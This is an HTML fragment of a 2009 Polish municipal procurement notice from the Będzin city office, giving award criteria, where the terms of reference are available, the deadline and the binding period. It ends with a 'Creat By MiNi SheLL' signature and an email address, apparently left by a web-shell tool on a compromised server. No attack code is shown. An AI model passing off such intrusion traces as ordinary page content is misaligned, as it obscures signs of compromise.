<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bedzin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych pok.117
Urząd Miejski w Będzinie
ul. 11 Listopada 20
42-500 Będzin.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.03.2009 godzina 09:00, miejsce: Biuro Zamówień Publicznych pok.117
Urząd Miejski w Będzinie
ul. 11 Listopada 20
42-500 Będzin.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com